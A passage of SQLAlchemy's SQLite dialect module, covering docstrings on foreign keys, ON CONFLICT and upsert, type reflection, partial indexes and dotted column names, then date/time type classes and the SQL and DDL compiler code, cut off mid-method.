or SQLITE_OMIT_TRIGGER symbols enabled.
* The ``PRAGMA foreign_keys = ON`` statement must be emitted on all
connections before use -- including the initial call to
:meth:`sqlalchemy.schema.MetaData.create_all`.
SQLAlchemy allows for the ``PRAGMA`` statement to be emitted automatically for
new connections through the usage of events::
from sqlalchemy.engine import Engine
from sqlalchemy import event
@event.listens_for(Engine, "connect")
def set_sqlite_pragma(dbapi_connection, connection_record):
cursor = dbapi_connection.cursor()
cursor.execute("PRAGMA foreign_keys=ON")
cursor.close()
.. warning::
When SQLite foreign keys are enabled, it is **not possible**
to emit CREATE or DROP statements for tables that contain
mutually-dependent foreign key constraints;
to emit the DDL for these tables requires that ALTER TABLE be used to
create or drop these constraints separately, for which SQLite has
no support.
.. seealso::
`SQLite Foreign Key Support <https://www.sqlite.org/foreignkeys.html>`_
- on the SQLite web site.
:ref:`event_toplevel` - SQLAlchemy event API.
:ref:`use_alter` - more information on SQLAlchemy's facilities for handling
mutually-dependent foreign key constraints.
.. _sqlite_on_conflict_ddl:
ON CONFLICT support for constraints
-----------------------------------
.. seealso:: This section describes the :term:`DDL` version of "ON CONFLICT" for
SQLite, which occurs within a CREATE TABLE statement. For "ON CONFLICT" as
applied to an INSERT statement, see :ref:`sqlite_on_conflict_insert`.
SQLite supports a non-standard DDL clause known as ON CONFLICT which can be applied
to primary key, unique, check, and not null constraints. In DDL, it is
rendered either within the "CONSTRAINT" clause or within the column definition
itself depending on the location of the target constraint. To render this
clause within DDL, the extension parameter ``sqlite_on_conflict`` can be
specified with a string conflict resolution algorithm within the
:class:`.PrimaryKeyConstraint`, :class:`.UniqueConstraint`,
:class:`.CheckConstraint` objects. Within the :class:`_schema.Column` object,
there
are individual parameters ``sqlite_on_conflict_not_null``,
``sqlite_on_conflict_primary_key``, ``sqlite_on_conflict_unique`` which each
correspond to the three types of relevant constraint types that can be
indicated from a :class:`_schema.Column` object.
.. seealso::
`ON CONFLICT <https://www.sqlite.org/lang_conflict.html>`_ - in the SQLite
documentation
.. versionadded:: 1.3
The ``sqlite_on_conflict`` parameters accept a string argument which is just
the resolution name to be chosen, which on SQLite can be one of ROLLBACK,
ABORT, FAIL, IGNORE, and REPLACE. For example, to add a UNIQUE constraint
that specifies the IGNORE algorithm::
some_table = Table(
'some_table', metadata,
Column('id', Integer, primary_key=True),
Column('data', Integer),
UniqueConstraint('id', 'data', sqlite_on_conflict='IGNORE')
)
The above renders CREATE TABLE DDL as::
CREATE TABLE some_table (
id INTEGER NOT NULL,
data INTEGER,
PRIMARY KEY (id),
UNIQUE (id, data) ON CONFLICT IGNORE
)
When using the :paramref:`_schema.Column.unique`
flag to add a UNIQUE constraint
to a single column, the ``sqlite_on_conflict_unique`` parameter can
be added to the :class:`_schema.Column` as well, which will be added to the
UNIQUE constraint in the DDL::
some_table = Table(
'some_table', metadata,
Column('id', Integer, primary_key=True),
Column('data', Integer, unique=True,
sqlite_on_conflict_unique='IGNORE')
)
rendering::
CREATE TABLE some_table (
id INTEGER NOT NULL,
data INTEGER,
PRIMARY KEY (id),
UNIQUE (data) ON CONFLICT IGNORE
)
To apply the FAIL algorithm for a NOT NULL constraint,
``sqlite_on_conflict_not_null`` is used::
some_table = Table(
'some_table', metadata,
Column('id', Integer, primary_key=True),
Column('data', Integer, nullable=False,
sqlite_on_conflict_not_null='FAIL')
)
this renders the column inline ON CONFLICT phrase::
CREATE TABLE some_table (
id INTEGER NOT NULL,
data INTEGER NOT NULL ON CONFLICT FAIL,
PRIMARY KEY (id)
)
Similarly, for an inline primary key, use ``sqlite_on_conflict_primary_key``::
some_table = Table(
'some_table', metadata,
Column('id', Integer, primary_key=True,
sqlite_on_conflict_primary_key='FAIL')
)
SQLAlchemy renders the PRIMARY KEY constraint separately, so the conflict
resolution algorithm is applied to the constraint itself::
CREATE TABLE some_table (
id INTEGER NOT NULL,
PRIMARY KEY (id) ON CONFLICT FAIL
)
.. _sqlite_on_conflict_insert:
INSERT...ON CONFLICT (Upsert)
-----------------------------------
.. seealso:: This section describes the :term:`DML` version of "ON CONFLICT" for
SQLite, which occurs within an INSERT statement. For "ON CONFLICT" as
applied to a CREATE TABLE statement, see :ref:`sqlite_on_conflict_ddl`.
From version 3.24.0 onwards, SQLite supports "upserts" (update or insert)
of rows into a table via the ``ON CONFLICT`` clause of the ``INSERT``
statement. A candidate row will only be inserted if that row does not violate
any unique or primary key constraints. In the case of a unique constraint violation, a
secondary action can occur which can be either "DO UPDATE", indicating that
the data in the target row should be updated, or "DO NOTHING", which indicates
to silently skip this row.
Conflicts are determined using columns that are part of existing unique
constraints and indexes. These constraints are identified by stating the
columns and conditions that comprise the indexes.
SQLAlchemy provides ``ON CONFLICT`` support via the SQLite-specific
:func:`_sqlite.insert()` function, which provides
the generative methods :meth:`_sqlite.Insert.on_conflict_do_update`
and :meth:`_sqlite.Insert.on_conflict_do_nothing`:
.. sourcecode:: pycon+sql
>>> from sqlalchemy.dialects.sqlite import insert
>>> insert_stmt = insert(my_table).values(
... id='some_existing_id',
... data='inserted value')
>>> do_update_stmt = insert_stmt.on_conflict_do_update(
... index_elements=['id'],
... set_=dict(data='updated value')
... )
>>> print(do_update_stmt)
{opensql}INSERT INTO my_table (id, data) VALUES (?, ?)
ON CONFLICT (id) DO UPDATE SET data = ?{stop}
>>> do_nothing_stmt = insert_stmt.on_conflict_do_nothing(
... index_elements=['id']
... )
>>> print(do_nothing_stmt)
{opensql}INSERT INTO my_table (id, data) VALUES (?, ?)
ON CONFLICT (id) DO NOTHING
.. versionadded:: 1.4
.. seealso::
`Upsert
<https://sqlite.org/lang_UPSERT.html>`_
- in the SQLite documentation.
Specifying the Target
^^^^^^^^^^^^^^^^^^^^^
Both methods supply the "target" of the conflict using column inference:
* The :paramref:`_sqlite.Insert.on_conflict_do_update.index_elements` argument
specifies a sequence containing string column names, :class:`_schema.Column`
objects, and/or SQL expression elements, which would identify a unique index
or unique constraint.
* When using :paramref:`_sqlite.Insert.on_conflict_do_update.index_elements`
to infer an index, a partial index can be inferred by also specifying the
:paramref:`_sqlite.Insert.on_conflict_do_update.index_where` parameter:
.. sourcecode:: pycon+sql
>>> stmt = insert(my_table).values(user_email='[email protected]', data='inserted data')
>>> do_update_stmt = stmt.on_conflict_do_update(
... index_elements=[my_table.c.user_email],
... index_where=my_table.c.user_email.like('%@gmail.com'),
... set_=dict(data=stmt.excluded.data)
... )
>>> print(do_update_stmt)
{opensql}INSERT INTO my_table (data, user_email) VALUES (?, ?)
ON CONFLICT (user_email)
WHERE user_email LIKE '%@gmail.com'
DO UPDATE SET data = excluded.data
>>>
The SET Clause
^^^^^^^^^^^^^^^
``ON CONFLICT...DO UPDATE`` is used to perform an update of the already
existing row, using any combination of new values as well as values
from the proposed insertion. These values are specified using the
:paramref:`_sqlite.Insert.on_conflict_do_update.set_` parameter. This
parameter accepts a dictionary which consists of direct values
for UPDATE:
.. sourcecode:: pycon+sql
>>> stmt = insert(my_table).values(id='some_id', data='inserted value')
>>> do_update_stmt = stmt.on_conflict_do_update(
... index_elements=['id'],
... set_=dict(data='updated value')
... )
>>> print(do_update_stmt)
{opensql}INSERT INTO my_table (id, data) VALUES (?, ?)
ON CONFLICT (id) DO UPDATE SET data = ?
.. warning::
The :meth:`_sqlite.Insert.on_conflict_do_update` method does **not** take
into account Python-side default UPDATE values or generation functions,
e.g. those specified using :paramref:`_schema.Column.onupdate`. These
values will not be exercised for an ON CONFLICT style of UPDATE, unless
they are manually specified in the
:paramref:`_sqlite.Insert.on_conflict_do_update.set_` dictionary.
Updating using the Excluded INSERT Values
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
In order to refer to the proposed insertion row, the special alias
:attr:`~.sqlite.Insert.excluded` is available as an attribute on
the :class:`_sqlite.Insert` object; this object creates an "excluded." prefix
on a column, that informs the DO UPDATE to update the row with the value that
would have been inserted had the constraint not failed:
.. sourcecode:: pycon+sql
>>> stmt = insert(my_table).values(
... id='some_id',
... data='inserted value',
... author='jlh'
... )
>>> do_update_stmt = stmt.on_conflict_do_update(
... index_elements=['id'],
... set_=dict(data='updated value', author=stmt.excluded.author)
... )
>>> print(do_update_stmt)
{opensql}INSERT INTO my_table (id, data, author) VALUES (?, ?, ?)
ON CONFLICT (id) DO UPDATE SET data = ?, author = excluded.author
Additional WHERE Criteria
^^^^^^^^^^^^^^^^^^^^^^^^^
The :meth:`_sqlite.Insert.on_conflict_do_update` method also accepts
a WHERE clause using the :paramref:`_sqlite.Insert.on_conflict_do_update.where`
parameter, which will limit those rows which receive an UPDATE:
.. sourcecode:: pycon+sql
>>> stmt = insert(my_table).values(
... id='some_id',
... data='inserted value',
... author='jlh'
... )
>>> on_update_stmt = stmt.on_conflict_do_update(
... index_elements=['id'],
... set_=dict(data='updated value', author=stmt.excluded.author),
... where=(my_table.c.status == 2)
... )
>>> print(on_update_stmt)
{opensql}INSERT INTO my_table (id, data, author) VALUES (?, ?, ?)
ON CONFLICT (id) DO UPDATE SET data = ?, author = excluded.author
WHERE my_table.status = ?
Skipping Rows with DO NOTHING
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
``ON CONFLICT`` may be used to skip inserting a row entirely
if any conflict with a unique constraint occurs; below this is illustrated
using the :meth:`_sqlite.Insert.on_conflict_do_nothing` method:
.. sourcecode:: pycon+sql
>>> stmt = insert(my_table).values(id='some_id', data='inserted value')
>>> stmt = stmt.on_conflict_do_nothing(index_elements=['id'])
>>> print(stmt)
{opensql}INSERT INTO my_table (id, data) VALUES (?, ?) ON CONFLICT (id) DO NOTHING
If ``DO NOTHING`` is used without specifying any columns or constraint,
it has the effect of skipping the INSERT for any unique violation which
occurs:
.. sourcecode:: pycon+sql
>>> stmt = insert(my_table).values(id='some_id', data='inserted value')
>>> stmt = stmt.on_conflict_do_nothing()
>>> print(stmt)
{opensql}INSERT INTO my_table (id, data) VALUES (?, ?) ON CONFLICT DO NOTHING
.. _sqlite_type_reflection:
Type Reflection
---------------
SQLite types are unlike those of most other database backends, in that
the string name of the type usually does not correspond to a "type" in a
one-to-one fashion. Instead, SQLite links per-column typing behavior
to one of five so-called "type affinities" based on a string matching
pattern for the type.
SQLAlchemy's reflection process, when inspecting types, uses a simple
lookup table to link the keywords returned to provided SQLAlchemy types.
This lookup table is present within the SQLite dialect as it is for all
other dialects. However, the SQLite dialect has a different "fallback"
routine for when a particular type name is not located in the lookup map;
it instead implements the SQLite "type affinity" scheme located at
https://www.sqlite.org/datatype3.html section 2.1.
The provided typemap will make direct associations from an exact string
name match for the following types:
:class:`_types.BIGINT`, :class:`_types.BLOB`,
:class:`_types.BOOLEAN`, :class:`_types.BOOLEAN`,
:class:`_types.CHAR`, :class:`_types.DATE`,
:class:`_types.DATETIME`, :class:`_types.FLOAT`,
:class:`_types.DECIMAL`, :class:`_types.FLOAT`,
:class:`_types.INTEGER`, :class:`_types.INTEGER`,
:class:`_types.NUMERIC`, :class:`_types.REAL`,
:class:`_types.SMALLINT`, :class:`_types.TEXT`,
:class:`_types.TIME`, :class:`_types.TIMESTAMP`,
:class:`_types.VARCHAR`, :class:`_types.NVARCHAR`,
:class:`_types.NCHAR`
When a type name does not match one of the above types, the "type affinity"
lookup is used instead:
* :class:`_types.INTEGER` is returned if the type name includes the
string ``INT``
* :class:`_types.TEXT` is returned if the type name includes the
string ``CHAR``, ``CLOB`` or ``TEXT``
* :class:`_types.NullType` is returned if the type name includes the
string ``BLOB``
* :class:`_types.REAL` is returned if the type name includes the string
``REAL``, ``FLOA`` or ``DOUB``.
* Otherwise, the :class:`_types.NUMERIC` type is used.
.. versionadded:: 0.9.3 Support for SQLite type affinity rules when reflecting
columns.
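For example, a sketch showing the affinity fallback during reflection (the
table and type names below are illustrative)::
    from sqlalchemy import create_engine, inspect
    eng = create_engine("sqlite://")
    with eng.begin() as conn:
        conn.exec_driver_sql("CREATE TABLE t (x XYZINTQPR)")
    # "XYZINTQPR" is not in the lookup table, but contains "INT",
    # so the column reflects with INTEGER affinity
    print(inspect(eng).get_columns("t"))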
.. _sqlite_partial_index:
Partial Indexes
---------------
A partial index, e.g. one which uses a WHERE clause, can be specified
with the DDL system using the argument ``sqlite_where``::
tbl = Table('testtbl', m, Column('data', Integer))
idx = Index('test_idx1', tbl.c.data,
sqlite_where=and_(tbl.c.data > 5, tbl.c.data < 10))
The index will be rendered at create time as::
CREATE INDEX test_idx1 ON testtbl (data)
WHERE data > 5 AND data < 10
.. versionadded:: 0.9.9
.. _sqlite_dotted_column_names:
Dotted Column Names
-------------------
Using table or column names that explicitly have periods in them is
**not recommended**. While this is generally a bad idea for relational
databases in general, as the dot is a syntactically significant character,
the SQLite driver up until version **3.10.0** of SQLite has a bug which
requires that SQLAlchemy filter out these dots in result sets.
.. versionchanged:: 1.1
The following SQLite issue has been resolved as of version 3.10.0
of SQLite. SQLAlchemy as of **1.1** automatically disables its internal
workarounds based on detection of this version.
The bug, entirely outside of SQLAlchemy, can be illustrated thusly::
import sqlite3
assert sqlite3.sqlite_version_info < (3, 10, 0), "bug is fixed in this version"
conn = sqlite3.connect(":memory:")
cursor = conn.cursor()
cursor.execute("create table x (a integer, b integer)")
cursor.execute("insert into x (a, b) values (1, 1)")
cursor.execute("insert into x (a, b) values (2, 2)")
cursor.execute("select x.a, x.b from x")
assert [c[0] for c in cursor.description] == ['a', 'b']
cursor.execute('''
select x.a, x.b from x where a=1
union
select x.a, x.b from x where a=2
''')
assert [c[0] for c in cursor.description] == ['a', 'b'], \
[c[0] for c in cursor.description]
The second assertion fails::
Traceback (most recent call last):
File "test.py", line 19, in <module>
[c[0] for c in cursor.description]
AssertionError: ['x.a', 'x.b']
Where above, the driver incorrectly reports the names of the columns
including the name of the table, which is entirely inconsistent vs.
when the UNION is not present.
SQLAlchemy relies upon column names being predictable in how they match
to the original statement, so the SQLAlchemy dialect has no choice but
to filter these out::
from sqlalchemy import create_engine
eng = create_engine("sqlite://")
conn = eng.connect()
conn.exec_driver_sql("create table x (a integer, b integer)")
conn.exec_driver_sql("insert into x (a, b) values (1, 1)")
conn.exec_driver_sql("insert into x (a, b) values (2, 2)")
result = conn.exec_driver_sql("select x.a, x.b from x")
assert result.keys() == ["a", "b"]
result = conn.exec_driver_sql('''
select x.a, x.b from x where a=1
union
select x.a, x.b from x where a=2
''')
assert result.keys() == ["a", "b"]
Note that above, even though SQLAlchemy filters out the dots, *both
names are still addressable*::
>>> row = result.first()
>>> row["a"]
1
>>> row["x.a"]
1
>>> row["b"]
1
>>> row["x.b"]
1
Therefore, the workaround applied by SQLAlchemy only impacts
:meth:`_engine.CursorResult.keys` and :meth:`.Row.keys()` in the public API. In
the very specific case where an application is forced to use column names that
contain dots, and the functionality of :meth:`_engine.CursorResult.keys` and
:meth:`.Row.keys()` is required to return these dotted names unmodified,
the ``sqlite_raw_colnames`` execution option may be provided, either on a
per-:class:`_engine.Connection` basis::
result = conn.execution_options(sqlite_raw_colnames=True).exec_driver_sql('''
select x.a, x.b from x where a=1
union
select x.a, x.b from x where a=2
''')
assert result.keys() == ["x.a", "x.b"]
or on a per-:class:`_engine.Engine` basis::
engine = create_engine("sqlite://", execution_options={"sqlite_raw_colnames": True})
When using the per-:class:`_engine.Engine` execution option, note that
**Core and ORM queries that use UNION may not function properly**.
SQLite-specific table options
-----------------------------
One option for CREATE TABLE is supported directly by the SQLite
dialect in conjunction with the :class:`_schema.Table` construct:
* ``WITHOUT ROWID``::
Table("some_table", metadata, ..., sqlite_with_rowid=False)
.. seealso::
`SQLite CREATE TABLE options
<https://www.sqlite.org/lang_createtable.html>`_
""" # noqa
import datetime
import numbers
import re
from .json import JSON
from .json import JSONIndexType
from .json import JSONPathType
from ... import exc
from ... import schema as sa_schema
from ... import sql
from ... import types as sqltypes
from ... import util
from ...engine import default
from ...engine import processors
from ...engine import reflection
from ...sql import coercions
from ...sql import ColumnElement
from ...sql import compiler
from ...sql import elements
from ...sql import roles
from ...sql import schema
from ...types import BLOB # noqa
from ...types import BOOLEAN # noqa
from ...types import CHAR # noqa
from ...types import DECIMAL # noqa
from ...types import FLOAT # noqa
from ...types import INTEGER # noqa
from ...types import NUMERIC # noqa
from ...types import REAL # noqa
from ...types import SMALLINT # noqa
from ...types import TEXT # noqa
from ...types import TIMESTAMP # noqa
from ...types import VARCHAR # noqa
class _SQliteJson(JSON):
def result_processor(self, dialect, coltype):
default_processor = super(_SQliteJson, self).result_processor(
dialect, coltype
)
def process(value):
try:
return default_processor(value)
except TypeError:
if isinstance(value, numbers.Number):
return value
else:
raise
return process
class _DateTimeMixin:
_reg = None
_storage_format = None
def __init__(self, storage_format=None, regexp=None, **kw):
super(_DateTimeMixin, self).__init__(**kw)
if regexp is not None:
self._reg = re.compile(regexp)
if storage_format is not None:
self._storage_format = storage_format
@property
def format_is_text_affinity(self):
"""return True if the storage format will automatically imply
a TEXT affinity.
If the storage format contains no non-numeric characters,
it will imply a NUMERIC storage format on SQLite; in this case,
the type will generate its DDL as DATE_CHAR, DATETIME_CHAR,
TIME_CHAR.
.. versionadded:: 1.0.0
"""
spec = self._storage_format % {
"year": 0,
"month": 0,
"day": 0,
"hour": 0,
"minute": 0,
"second": 0,
"microsecond": 0,
}
return bool(re.search(r"[^0-9]", spec))
def adapt(self, cls, **kw):
if issubclass(cls, _DateTimeMixin):
if self._storage_format:
kw["storage_format"] = self._storage_format
if self._reg:
kw["regexp"] = self._reg
return super(_DateTimeMixin, self).adapt(cls, **kw)
def literal_processor(self, dialect):
bp = self.bind_processor(dialect)
def process(value):
return "'%s'" % bp(value)
return process
class DATETIME(_DateTimeMixin, sqltypes.DateTime):
r"""Represent a Python datetime object in SQLite using a string.
The default string storage format is::
"%(year)04d-%(month)02d-%(day)02d %(hour)02d:%(minute)02d:%(second)02d.%(microsecond)06d"
e.g.::
2021-03-15 12:05:57.105542
The storage format can be customized to some degree using the
``storage_format`` and ``regexp`` parameters, such as::
import re
from sqlalchemy.dialects.sqlite import DATETIME
dt = DATETIME(storage_format="%(year)04d/%(month)02d/%(day)02d "
"%(hour)02d:%(minute)02d:%(second)02d",
                      regexp=r"(\d+)/(\d+)/(\d+) (\d+):(\d+):(\d+)"
)
:param storage_format: format string which will be applied to the dict
with keys year, month, day, hour, minute, second, and microsecond.
:param regexp: regular expression which will be applied to incoming result
rows. If the regexp contains named groups, the resulting match dict is
applied to the Python datetime() constructor as keyword arguments.
Otherwise, if positional groups are used, the datetime() constructor
is called with positional arguments via
``*map(int, match_obj.groups(0))``.
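    The ``truncate_microseconds`` keyword accepted by this type's constructor
    (a minimal sketch; it may not be combined with ``storage_format`` or
    ``regexp``) drops the microseconds portion from the stored string::
        dt = DATETIME(truncate_microseconds=True)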
""" # noqa
_storage_format = (
"%(year)04d-%(month)02d-%(day)02d "
"%(hour)02d:%(minute)02d:%(second)02d.%(microsecond)06d"
)
def __init__(self, *args, **kwargs):
truncate_microseconds = kwargs.pop("truncate_microseconds", False)
super(DATETIME, self).__init__(*args, **kwargs)
if truncate_microseconds:
assert "storage_format" not in kwargs, (
"You can specify only "
"one of truncate_microseconds or storage_format."
)
assert "regexp" not in kwargs, (
"You can specify only one of "
"truncate_microseconds or regexp."
)
self._storage_format = (
"%(year)04d-%(month)02d-%(day)02d "
"%(hour)02d:%(minute)02d:%(second)02d"
)
def bind_processor(self, dialect):
datetime_datetime = datetime.datetime
datetime_date = datetime.date
format_ = self._storage_format
def process(value):
if value is None:
return None
elif isinstance(value, datetime_datetime):
return format_ % {
"year": value.year,
"month": value.month,
"day": value.day,
"hour": value.hour,
"minute": value.minute,
"second": value.second,
"microsecond": value.microsecond,
}
elif isinstance(value, datetime_date):
return format_ % {
"year": value.year,
"month": value.month,
"day": value.day,
"hour": 0,
"minute": 0,
"second": 0,
"microsecond": 0,
}
else:
raise TypeError(
"SQLite DateTime type only accepts Python "
"datetime and date objects as input."
)
return process
def result_processor(self, dialect, coltype):
if self._reg:
return processors.str_to_datetime_processor_factory(
self._reg, datetime.datetime
)
else:
return processors.str_to_datetime
class DATE(_DateTimeMixin, sqltypes.Date):
r"""Represent a Python date object in SQLite using a string.
The default string storage format is::
"%(year)04d-%(month)02d-%(day)02d"
e.g.::
2011-03-15
The storage format can be customized to some degree using the
``storage_format`` and ``regexp`` parameters, such as::
import re
from sqlalchemy.dialects.sqlite import DATE
d = DATE(
storage_format="%(month)02d/%(day)02d/%(year)04d",
regexp=re.compile("(?P<month>\d+)/(?P<day>\d+)/(?P<year>\d+)")
)
:param storage_format: format string which will be applied to the
dict with keys year, month, and day.
:param regexp: regular expression which will be applied to
incoming result rows. If the regexp contains named groups, the
resulting match dict is applied to the Python date() constructor
as keyword arguments. Otherwise, if positional groups are used, the
date() constructor is called with positional arguments via
``*map(int, match_obj.groups(0))``.
"""
_storage_format = "%(year)04d-%(month)02d-%(day)02d"
def bind_processor(self, dialect):
datetime_date = datetime.date
format_ = self._storage_format
def process(value):
if value is None:
return None
elif isinstance(value, datetime_date):
return format_ % {
"year": value.year,
"month": value.month,
"day": value.day,
}
else:
raise TypeError(
"SQLite Date type only accepts Python "
"date objects as input."
)
return process
def result_processor(self, dialect, coltype):
if self._reg:
return processors.str_to_datetime_processor_factory(
self._reg, datetime.date
)
else:
return processors.str_to_date
class TIME(_DateTimeMixin, sqltypes.Time):
r"""Represent a Python time object in SQLite using a string.
The default string storage format is::
"%(hour)02d:%(minute)02d:%(second)02d.%(microsecond)06d"
e.g.::
        12:05:57.105542
The storage format can be customized to some degree using the
``storage_format`` and ``regexp`` parameters, such as::
import re
from sqlalchemy.dialects.sqlite import TIME
t = TIME(storage_format="%(hour)02d-%(minute)02d-"
"%(second)02d-%(microsecond)06d",
                 regexp=re.compile("(\d+)-(\d+)-(\d+)(?:-(\d+))?")
)
:param storage_format: format string which will be applied to the dict
with keys hour, minute, second, and microsecond.
:param regexp: regular expression which will be applied to incoming result
rows. If the regexp contains named groups, the resulting match dict is
applied to the Python time() constructor as keyword arguments. Otherwise,
if positional groups are used, the time() constructor is called with
positional arguments via ``*map(int, match_obj.groups(0))``.
"""
_storage_format = "%(hour)02d:%(minute)02d:%(second)02d.%(microsecond)06d"
def __init__(self, *args, **kwargs):
truncate_microseconds = kwargs.pop("truncate_microseconds", False)
super(TIME, self).__init__(*args, **kwargs)
if truncate_microseconds:
assert "storage_format" not in kwargs, (
"You can specify only "
"one of truncate_microseconds or storage_format."
)
assert "regexp" not in kwargs, (
"You can specify only one of "
"truncate_microseconds or regexp."
)
self._storage_format = "%(hour)02d:%(minute)02d:%(second)02d"
def bind_processor(self, dialect):
datetime_time = datetime.time
format_ = self._storage_format
def process(value):
if value is None:
return None
elif isinstance(value, datetime_time):
return format_ % {
"hour": value.hour,
"minute": value.minute,
"second": value.second,
"microsecond": value.microsecond,
}
else:
raise TypeError(
"SQLite Time type only accepts Python "
"time objects as input."
)
return process
def result_processor(self, dialect, coltype):
if self._reg:
return processors.str_to_datetime_processor_factory(
self._reg, datetime.time
)
else:
return processors.str_to_time
colspecs = {
sqltypes.Date: DATE,
sqltypes.DateTime: DATETIME,
sqltypes.JSON: _SQliteJson,
sqltypes.JSON.JSONIndexType: JSONIndexType,
sqltypes.JSON.JSONPathType: JSONPathType,
sqltypes.Time: TIME,
}
ischema_names = {
"BIGINT": sqltypes.BIGINT,
"BLOB": sqltypes.BLOB,
"BOOL": sqltypes.BOOLEAN,
"BOOLEAN": sqltypes.BOOLEAN,
"CHAR": sqltypes.CHAR,
"DATE": sqltypes.DATE,
"DATE_CHAR": sqltypes.DATE,
"DATETIME": sqltypes.DATETIME,
"DATETIME_CHAR": sqltypes.DATETIME,
"DOUBLE": sqltypes.DOUBLE,
"DECIMAL": sqltypes.DECIMAL,
"FLOAT": sqltypes.FLOAT,
"INT": sqltypes.INTEGER,
"INTEGER": sqltypes.INTEGER,
"JSON": JSON,
"NUMERIC": sqltypes.NUMERIC,
"REAL": sqltypes.REAL,
"SMALLINT": sqltypes.SMALLINT,
"TEXT": sqltypes.TEXT,
"TIME": sqltypes.TIME,
"TIME_CHAR": sqltypes.TIME,
"TIMESTAMP": sqltypes.TIMESTAMP,
"VARCHAR": sqltypes.VARCHAR,
"NVARCHAR": sqltypes.NVARCHAR,
"NCHAR": sqltypes.NCHAR,
}
class SQLiteCompiler(compiler.SQLCompiler):
extract_map = util.update_copy(
compiler.SQLCompiler.extract_map,
{
"month": "%m",
"day": "%d",
"year": "%Y",
"second": "%S",
"hour": "%H",
"doy": "%j",
"minute": "%M",
"epoch": "%s",
"dow": "%w",
"week": "%W",
},
)
def visit_truediv_binary(self, binary, operator, **kw):
return (
self.process(binary.left, **kw)
+ " / "
+ "(%s + 0.0)" % self.process(binary.right, **kw)
)
def visit_now_func(self, fn, **kw):
return "CURRENT_TIMESTAMP"
def visit_localtimestamp_func(self, func, **kw):
return 'DATETIME(CURRENT_TIMESTAMP, "localtime")'
def visit_true(self, expr, **kw):
return "1"
def visit_false(self, expr, **kw):
return "0"
def visit_char_length_func(self, fn, **kw):
return "length%s" % self.function_argspec(fn)
def visit_cast(self, cast, **kwargs):
if self.dialect.supports_cast:
return super(SQLiteCompiler, self).visit_cast(cast, **kwargs)
else:
return self.process(cast.clause, **kwargs)
def visit_extract(self, extract, **kw):
try:
return "CAST(STRFTIME('%s', %s) AS INTEGER)" % (
self.extract_map[extract.field],
self.process(extract.expr, **kw),
)
except KeyError as err:
raise exc.CompileError(
"%s is not a valid extract argument." % extract.field
) from err
def limit_clause(self, select, **kw):
text = ""
if select._limit_clause is not None:
text += "\n LIMIT " + self.process(select._limit_clause, **kw)
if select._offset_clause is not None:
if select._limit_clause is None:
text += "\n LIMIT " + self.process(sql.literal(-1))
text += " OFFSET " + self.process(select._offset_clause, **kw)
else:
text += " OFFSET " + self.process(sql.literal(0), **kw)
return text
def for_update_clause(self, select, **kw):
# sqlite has no "FOR UPDATE" AFAICT
return ""
def visit_is_distinct_from_binary(self, binary, operator, **kw):
return "%s IS NOT %s" % (
self.process(binary.left),
self.process(binary.right),
)
def visit_is_not_distinct_from_binary(self, binary, operator, **kw):
return "%s IS %s" % (
self.process(binary.left),
self.process(binary.right),
)
def visit_json_getitem_op_binary(self, binary, operator, **kw):
if binary.type._type_affinity is sqltypes.JSON:
expr = "JSON_QUOTE(JSON_EXTRACT(%s, %s))"
else:
expr = "JSON_EXTRACT(%s, %s)"
return expr % (
self.process(binary.left, **kw),
self.process(binary.right, **kw),
)
def visit_json_path_getitem_op_binary(self, binary, operator, **kw):
if binary.type._type_affinity is sqltypes.JSON:
expr = "JSON_QUOTE(JSON_EXTRACT(%s, %s))"
else:
expr = "JSON_EXTRACT(%s, %s)"
return expr % (
self.process(binary.left, **kw),
self.process(binary.right, **kw),
)
def visit_empty_set_op_expr(self, type_, expand_op):
# slightly old SQLite versions don't seem to be able to handle
# the empty set impl
return self.visit_empty_set_expr(type_)
def visit_empty_set_expr(self, element_types):
return "SELECT %s FROM (SELECT %s) WHERE 1!=1" % (
", ".join("1" for type_ in element_types or [INTEGER()]),
", ".join("1" for type_ in element_types or [INTEGER()]),
)
def visit_regexp_match_op_binary(self, binary, operator, **kw):
return self._generate_generic_binary(binary, " REGEXP ", **kw)
def visit_not_regexp_match_op_binary(self, binary, operator, **kw):
return self._generate_generic_binary(binary, " NOT REGEXP ", **kw)
def _on_conflict_target(self, clause, **kw):
if clause.constraint_target is not None:
target_text = "(%s)" % clause.constraint_target
elif clause.inferred_target_elements is not None:
target_text = "(%s)" % ", ".join(
(
self.preparer.quote(c)
if isinstance(c, str)
else self.process(c, include_table=False, use_schema=False)
)
for c in clause.inferred_target_elements
)
if clause.inferred_target_whereclause is not None:
target_text += " WHERE %s" % self.process(
clause.inferred_target_whereclause,
include_table=False,
use_schema=False,
literal_binds=True,
)
else:
target_text = ""
return target_text
def visit_on_conflict_do_nothing(self, on_conflict, **kw):
target_text = self._on_conflict_target(on_conflict, **kw)
if target_text:
return "ON CONFLICT %s DO NOTHING" % target_text
else:
return "ON CONFLICT DO NOTHING"
def visit_on_conflict_do_update(self, on_conflict, **kw):
clause = on_conflict
target_text = self._on_conflict_target(on_conflict, **kw)
action_set_ops = []
set_parameters = dict(clause.update_values_to_set)
# create a list of column assignment clauses as tuples
insert_statement = self.stack[-1]["selectable"]
cols = insert_statement.table.c
for c in cols:
col_key = c.key
if col_key in set_parameters:
value = set_parameters.pop(col_key)
elif c in set_parameters:
value = set_parameters.pop(c)
else:
continue
if coercions._is_literal(value):
value = elements.BindParameter(None, value, type_=c.type)
else:
if (
isinstance(value, elements.BindParameter)
and value.type._isnull
):
value = value._clone()
value.type = c.type
value_text = self.process(value.self_group(), use_schema=False)
key_text = self.preparer.quote(col_key)
action_set_ops.append("%s = %s" % (key_text, value_text))
# check for names that don't match columns
if set_parameters:
util.warn(
"Additional column names not matching "
"any column keys in table '%s': %s"
% (
self.current_executable.table.name,
(", ".join("'%s'" % c for c in set_parameters)),
)
)
for k, v in set_parameters.items():
key_text = (
self.preparer.quote(k)
if isinstance(k, str)
else self.process(k, use_schema=False)
)
value_text = self.process(
coercions.expect(roles.ExpressionElementRole, v),
use_schema=False,
)
action_set_ops.append("%s = %s" % (key_text, value_text))
action_text = ", ".join(action_set_ops)
if clause.update_whereclause is not None:
action_text += " WHERE %s" % self.process(
clause.update_whereclause, include_table=True, use_schema=False
)
return "ON CONFLICT %s DO UPDATE SET %s" % (target_text, action_text)
class SQLiteDDLCompiler(compiler.DDLCompiler):
def get_column_specification(self, column, **kwargs):
coltype = self.dialect.type_compiler.process(
column.type, type_expression=column
)
colspec = self.preparer.format_column(column) + " " + coltype
default = self.get_column_default_string(column)
if default is not None:
if isinstance(column.server_default.arg, ColumnElement):
default = "(" + default + ")"
